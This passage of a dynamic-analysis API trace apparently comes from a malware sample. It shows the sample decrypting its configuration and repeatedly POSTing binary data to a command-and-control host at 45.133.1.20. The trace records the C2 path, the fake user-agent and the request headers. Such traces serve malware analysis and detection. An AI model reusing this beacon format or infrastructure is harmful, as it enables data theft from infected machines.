CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0282.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.336] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.344] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.347] GetProcessHeap () returned 0x6a0000 [0282.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0282.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.351] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0282.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.353] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0282.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.356] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0282.356] GetProcessHeap () returned 0x6a0000 [0282.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0282.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.371] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0282.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.374] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0282.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.375] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0282.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.377] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0282.377] GetProcessHeap () returned 0x6a0000 [0282.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0282.377] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0282.377] GetProcessHeap () returned 0x6a0000 [0282.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0282.377] socket (af=2, type=1, protocol=6) returned 0xa48 [0282.378] connect (s=0xa48, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0282.409] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0282.409] GetProcessHeap () returned 0x6a0000 [0282.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0282.409] GetProcessHeap () returned 0x6a0000 [0282.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0282.410] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0282.411] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0282.411] GetProcessHeap () returned 0x6a0000 [0282.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba470 [0282.411] GetProcessHeap () returned 0x6a0000 [0282.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0282.413] GetProcessHeap () returned 0x6a0000 [0282.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0282.413] GetProcessHeap () returned 0x6a0000 [0282.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0282.414] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0282.414] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0282.415] GetProcessHeap () returned 0x6a0000 [0282.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0282.415] GetProcessHeap () returned 0x6a0000 [0282.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0282.415] send (s=0xa48, buf=0x6bd460*, len=242, flags=0) returned 242 [0282.416] send (s=0xa48, buf=0x6bb998*, len=159, flags=0) returned 159 [0282.416] GetProcessHeap () returned 0x6a0000 [0282.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0282.416] recv (in: s=0xa48, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0282.490] GetProcessHeap () returned 0x6a0000 [0282.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0282.490] GetProcessHeap () returned 0x6a0000 [0282.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0282.491] GetProcessHeap () returned 0x6a0000 [0282.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba470 | out: hHeap=0x6a0000) returned 1 [0282.492] GetProcessHeap () returned 0x6a0000 [0282.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0282.492] closesocket (s=0xa48) returned 0 [0282.493] GetProcessHeap () returned 0x6a0000 [0282.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0282.493] GetProcessHeap () returned 0x6a0000 [0282.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0282.493] GetProcessHeap () returned 0x6a0000 [0282.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0282.493] GetProcessHeap () returned 0x6a0000 [0282.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0282.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17e4) returned 0xa48 [0282.495] Sleep (dwMilliseconds=0xea60) [0282.497] GetProcessHeap () returned 0x6a0000 [0282.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0282.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.498] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.506] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0282.518] GetProcessHeap () returned 0x6a0000 [0282.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0282.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.520] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0282.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.564] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.565] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.565] GetProcessHeap () returned 0x6a0000 [0282.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0282.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.567] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0282.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.568] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0282.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.569] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0282.569] GetProcessHeap () returned 0x6a0000 [0282.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0282.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.574] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.575] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.577] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.578] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.578] GetProcessHeap () returned 0x6a0000 [0282.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0282.578] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0282.578] GetProcessHeap () returned 0x6a0000 [0282.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0282.579] GetProcessHeap () returned 0x6a0000 [0282.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0282.580] GetProcessHeap () returned 0x6a0000 [0282.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0282.580] GetProcessHeap () returned 0x6a0000 [0282.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0282.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.582] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.641] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0282.658] GetProcessHeap () returned 0x6a0000 [0282.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0282.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.661] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0282.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.662] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.664] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.664] GetProcessHeap () returned 0x6a0000 [0282.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0282.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.666] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0282.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.673] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0282.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.674] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0282.674] GetProcessHeap () returned 0x6a0000 [0282.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0282.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.676] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0282.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.678] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0282.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.684] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0282.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.685] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0282.686] GetProcessHeap () returned 0x6a0000 [0282.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0282.686] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0282.686] GetProcessHeap () returned 0x6a0000 [0282.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0282.686] socket (af=2, type=1, protocol=6) returned 0xa4c [0282.686] connect (s=0xa4c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0282.714] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0282.714] GetProcessHeap () returned 0x6a0000 [0282.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0282.714] GetProcessHeap () returned 0x6a0000 [0282.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0282.715] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0282.717] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0282.717] GetProcessHeap () returned 0x6a0000 [0282.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba5f0 [0282.717] GetProcessHeap () returned 0x6a0000 [0282.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0282.718] GetProcessHeap () returned 0x6a0000 [0282.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0282.718] GetProcessHeap () returned 0x6a0000 [0282.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0282.719] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0282.720] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0282.720] GetProcessHeap () returned 0x6a0000 [0282.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0282.720] GetProcessHeap () returned 0x6a0000 [0282.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0282.721] send (s=0xa4c, buf=0x6bd460*, len=242, flags=0) returned 242 [0282.721] send (s=0xa4c, buf=0x6bb998*, len=159, flags=0) returned 159 [0282.721] GetProcessHeap () returned 0x6a0000 [0282.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0282.721] recv (in: s=0xa4c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0282.799] GetProcessHeap () returned 0x6a0000 [0282.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0282.800] GetProcessHeap () returned 0x6a0000 [0282.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0282.800] GetProcessHeap () returned 0x6a0000 [0282.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba5f0 | out: hHeap=0x6a0000) returned 1 [0282.804] GetProcessHeap () returned 0x6a0000 [0282.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0282.805] closesocket (s=0xa4c) returned 0 [0282.806] GetProcessHeap () returned 0x6a0000 [0282.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0282.806] GetProcessHeap () returned 0x6a0000 [0282.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0282.819] GetProcessHeap () returned 0x6a0000 [0282.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0282.820] GetProcessHeap () returned 0x6a0000 [0282.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0282.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17e8) returned 0xa4c [0282.823] Sleep (dwMilliseconds=0xea60) [0282.825] GetProcessHeap () returned 0x6a0000 [0282.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0282.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.837] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0282.848] GetProcessHeap () returned 0x6a0000 [0282.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0282.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.850] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0282.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.851] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.854] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.854] GetProcessHeap () returned 0x6a0000 [0282.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0282.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.869] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0282.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.870] CryptDestroyKey (hKey=0x6ad020) returned 1 [0282.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.871] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0282.871] GetProcessHeap () returned 0x6a0000 [0282.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0282.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.873] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.874] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.875] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.876] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.876] GetProcessHeap () returned 0x6a0000 [0282.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0282.877] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0282.877] GetProcessHeap () returned 0x6a0000 [0282.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0282.878] GetProcessHeap () returned 0x6a0000 [0282.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0282.881] GetProcessHeap () returned 0x6a0000 [0282.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0282.881] GetProcessHeap () returned 0x6a0000 [0282.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0282.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.882] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.892] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0282.900] GetProcessHeap () returned 0x6a0000 [0282.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0282.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.901] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0282.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.903] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.904] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.904] GetProcessHeap () returned 0x6a0000 [0282.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0282.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.906] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, 